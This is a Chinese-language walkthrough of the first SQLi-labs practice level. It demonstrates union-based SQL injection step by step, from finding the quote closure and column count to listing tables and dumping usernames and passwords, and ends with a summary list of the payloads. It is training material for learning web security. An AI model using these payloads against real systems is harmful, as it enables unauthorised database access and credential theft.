Less-1

短短max發表於2024-10-01

頁面

1、首先要進行判斷閉合方式

一般為兩種 / 和 ' 或者 " 進行閉合

1.1

這是\進行判斷,輸入\,後面是',應該是單引號閉合

進行輸入:

?id=1' --+

沒有報錯,說明是單引號閉合

2、檢視欄位數

進行查詢一共有多少欄位數

?id=1' order by 3--+

2.1

輸入時候發現3有回顯,但是4沒有回顯。由此判斷欄位數是3

3、判斷回顯位

-1' union select 1,2,3--+ //判斷回顯點

3.1發現有回顯內容是正確的

加到4發現報錯

由此可見2、3欄位內容在回顯頁面中

4、進行爆破資料庫名

同理將3改為database(),得到資料庫名

-1' union select 1,2,database()--+ //得到資料庫名

4.1:注意

注:這裡改為-1是為了,不讓資料庫查詢到此id,以便3執行後面的語句

得到資料庫名security

5、爆破錶名

語法:

-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ //得到該資料庫下的所有表名

此時發現資料庫下面存在四個表

6、爆破欄位名

我們進行爆破user表中的欄位名

-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ //得到users表中的欄位名

7.爆破欄位中的內容

以password和username的內容

-1' union select 1,2,group_concat(username,password) from users--+ //得到users表中username,password的內容

到此為止一共用到以下語句

1' order by 3--+ //判斷出頁面中存在三個欄位
-1' union select 1,2,3--+ //判斷回顯點
-1' union select 1,2,database()--+ //得到資料庫名
-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ //得到該資料庫下的所有表名
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ //得到users表中的欄位名
-1' union select 1,2,group_concat(username,password) from users--+ //得到users表中username,password的內容